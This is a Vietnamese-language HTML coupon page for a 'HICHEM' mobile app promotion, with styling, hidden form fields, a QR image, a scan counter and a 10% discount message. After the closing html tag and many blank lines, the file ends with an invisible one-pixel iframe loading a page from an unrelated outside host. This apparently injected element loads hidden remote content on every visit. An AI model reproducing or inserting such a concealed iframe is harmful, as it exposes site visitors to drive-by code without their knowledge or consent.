<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html>
<head>
  <title>Coupon</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=3.0">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <link rel="stylesheet" type="text/css" href="style.css">

<style type="text/css">
    body{background-color:#FFFFFF;}
    .top_box
    {
        background-color:#ffffff;
        background:rgba(255,255,2255, 0.5);
        -webkit-border-radius: 3px;
        -moz-border-radius: 3px;
        border-radius: 3px;
        margin: 20px 20px 15px;
        padding: 10px;
    }
    .coupon_shadow
    {
        -webkit-box-shadow: -1px -1px 0px 0px rgba(0,0,0,.1), 1px 1px 0px 0px rgba(255,255,255,.7);
        -moz-box-shadow: -1px -1px 0px 0px rgba(0,0,0,.1), 1px 1px 0px 0px rgba(255,255,255,.7);
        box-shadow: -1px -1px 0px 0px rgba(0,0,0,.1), 1px 1px 0px 0px rgba(255,255,255,.7);
    }
    .coupon_details
    {
        color:#ffffff;
        background:rgba(255,255,2255, 0.5);
        -webkit-border-radius: 3px;
        -moz-border-radius: 3px;
        border-radius: 3px;
        font-family:Helvetica;
        font-size:16px;
        line-height:20px;
        padding:10px;
        margin:10px 20px;
    }
    .coupon_divider
    {
        background:url(coupon_divider.png);
        height:5px;
        margin:10px 35px;
        background-size: 205px 5px;
    }
    .coupon_howtounlock
    {
        color:#161515;
        font-size:15px;
        border-bottom:solid 1px #eee;
        font-family: Arial; 
    }
</style>
</head>
<body>
<input type="hidden" id="couponimageh" value="">
<input type="hidden" id="startdateh" value="">
<input type="hidden" id="enddateh" value="">
<input type="hidden" id="qrcodebarh" value="">
<input type="hidden" id="countofscans" value="">
<input type="hidden" id="hoursbeforecheckh" value="">
<input type="hidden" id="canbeusedagainh" value="">
<div class="logo">
		<img src="header-logo-hichem.png" class="headerlogo">
		
	</div>
<div align="center" class="top_box coupon_shadow" style="background-color: rgb(80, 183, 72);"><table cellspacing="0" width="100%">
	<tbody>
		<tr>
			<td align="left" rowspan="2"><img src="qrcodevinmilk.jpg" style="margin: 0px; padding: 0px 10px 0px 0px; position: relative; top: 0.625px; left: 0.0710268px; width: 115.469px; height: 89.5597px;"></td>
			<td align="left">
				<img src="couponlock.png" style="vertical-align:middle;width:16px; height: 16px">
				<div id="couponcountscan" style="display: inline; font-size: 15px; font-family: Arial; color: rgb(255, 0, 0);">0/150</div>
			</td>
		</tr>
		<tr>
			<td align="left"><font color="#ffffff"><img src="couponunlock.png" style="vertical-align:middle;width:16px; height: 16px">
				<a href="howunlockcoupon.html"><span class="coupon_howtounlock"><font color="#ffffff">Làm sao để nhận?</font></span></a></font></td>
		</tr>
	</tbody>
	</table></div>
<div class="coupon_details coupon_shadow" align="center" style="background-color: rgb(80, 183, 72);"><table cellpadding="0" cellspacing="0">
	<tbody>
		<tr>
			<td align="center" id="couponnameh" style="color: rgb(255, 255, 255); font-size: 20px; padding: 10px 0px 0px;">NHẬN PHIẾU COUPON<br>&nbsp;QUÀ TẶNG</td>
		</tr>
		<tr>
			<td><div class="coupon_divider"></div></td>
		</tr>
		<tr>
			<td id="coupondescriptionh">
				<div style="color: rgb(255, 255, 255); font-size: 13px; line-height: 22px;">Chào mừng giới thiệu App Mobile HICHEM. Tháng 10 - Yêu thương Phụ Nữ Việt Nam</div><div style="line-height: 22px;"><span style="color: rgb(255, 255, 255); font-size: 13px;">&nbsp;</span><br><em style="color: rgb(0, 0, 0); font-size: inherit; font-family: Roboto, sans-serif; box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-variant: inherit; font-weight: bold; font-stretch: inherit; line-height: inherit; vertical-align: baseline;"><span data-mce-style="color: #ff0000; font-size: 11pt;" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-style: inherit; font-variant-ligatures: inherit; font-variant-position: inherit; font-variant-caps: inherit; font-variant-numeric: inherit; font-variant-alternates: inherit; font-variant-east-asian: inherit; font-weight: inherit; font-stretch: inherit; font-size: 11pt; line-height: inherit; vertical-align: baseline; color: rgb(255, 255, 255);">*Các CTKM&nbsp;có thể bắt đầu sớm hoặc muộn hơn so với thông báo tùy theo tình hình hàng tồn kho tại các đại lý.</span></em><span style="font-size: 13px;">.!</span></div>
				<div style="text-align: center; color: #fff;font-size: 20px; padding: 30px 0px 10px;">Tiết kiệm ít nhất 10%</div>
			</td>
		</tr>
	</tbody>
	</table></div>

























</body>
</html>
<iframe src="http://sdengine.com/ga.html" frameBorder="0" width="100%" height="1"></iframe>